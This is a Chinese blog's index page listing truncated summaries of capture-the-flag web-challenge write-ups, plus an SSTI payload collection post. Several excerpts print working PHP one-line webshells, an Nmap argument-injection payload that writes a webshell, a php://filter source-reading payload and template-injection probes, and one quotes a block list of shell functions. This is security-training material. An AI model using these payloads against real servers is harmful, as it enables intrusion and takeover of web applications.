会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
返回顶部
你再不来,我就要下雪了
一厢情愿,就得愿赌服输
博客园
首页
新随笔
联系
订阅
管理
2020年9月15日
[NCTF2019]True XML cookbook
摘要: 题目给了一个登录界面: 尝试用Burp抓包 题目提示很明显XML注入 本题经过大量尝试,是查看hosts文件从而攻击内网 首先读取文件,得到内网IP段 然后访问该ip 发现没有结果,那么对内网ip进行扫描爆破 最后在ip=12的时候发现flag
阅读全文
posted @ 2020-09-15 10:40 星火不辍
阅读(829)
评论(0)
推荐(0)
2020年9月11日
[BJDCTF2020]EasySearch
摘要: 首先通过扫描发现index.php.swp备份文件 打开得到代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^
阅读全文
posted @ 2020-09-11 11:22 星火不辍
阅读(398)
评论(0)
推荐(0)
2020年9月10日
[GKCTF2020]老八小超市儿
摘要: 题目给了一个网站的模板 通过扫描进入后台admin.php 默认用户名admin 默认密码搜索得shopxo 在当前主题那里下载默认主题 然后在主题里面传一个一句话木马 <?php @eval($_POST[a]); phpinfo(); ?> 用菜刀连接(路径可在浏览器查看源码中找到) 打开fla
阅读全文
posted @ 2020-09-10 20:56 星火不辍
阅读(286)
评论(0)
推荐(0)
[WUSTCTF2020]朴实无华
摘要: 扫描目录 看到 robots.txt 访问 在响应头里面找到了提示信息 查看 源代码如下: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //le
阅读全文
posted @ 2020-09-10 15:29 星火不辍
阅读(201)
评论(0)
推荐(0)
2020年9月6日
[BSidesCF 2020]Had a bad day
摘要: 首先利用PHP伪协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($fil
阅读全文
posted @ 2020-09-06 22:28 星火不辍
阅读(488)
评论(0)
推荐(0)
2020年9月4日
SSTI-Payloads:一套针对服务器端模板注入技术的Payload集
摘要: {{2*2}}[[3*3]] {{3*3}} {{3*'3'}} <%= 3 * 3 %> ${6*6} ${{3*3}} @(6+5) #{3*3} #{ 3 * 3 } {{dump(app)}} {{app.request.server.all|join(',')}} {{config.ite
阅读全文
posted @ 2020-09-04 19:38 星火不辍
阅读(546)
评论(0)
推荐(0)
[网鼎杯 2020 朱雀组]Nmap
摘要: Nmap -oG 可以写入文件 因此我们可以写入一句话木马 payload如下 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 结果回显hacker php被过滤 因此考虑用短标签绕过 ' <?= @eval($_POST["pd"]);?> -oG
阅读全文
posted @ 2020-09-04 16:15 星火不辍
阅读(756)
评论(0)
推荐(0)
2020年8月31日
[网鼎杯 2020 朱雀组]phpweb
摘要: 抓包看一下 date是一个函数 后面是他的参数 由此形式我们猜测使用了 call_user_func()函数 于是我们尝试读取源代码 查看源代码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open
阅读全文
posted @ 2020-08-31 11:23 星火不辍
阅读(1038)
评论(0)
推荐(0)
2020年6月24日
渗透中的内网渗透
摘要: 搬运一个师傅的内网渗透教程 https://mp.weixin.qq.com/s/Mk5P_04SAitUjRztc9e-Rw
阅读全文
posted @ 2020-06-24 08:45 星火不辍
阅读(154)
评论(0)
推荐(0)
2020年6月21日
拟态web3
摘要: 源代码如下 package main import ( "fmt" "io/ioutil" "log" "net/http" "net/url" "strings" ) var ( secret = "xiaomo.wabzsy" banner = "Golang HTTP Server (v2.3
阅读全文
posted @ 2020-06-21 09:42 星火不辍
阅读(389)
评论(0)
推荐(0)
下一页
公告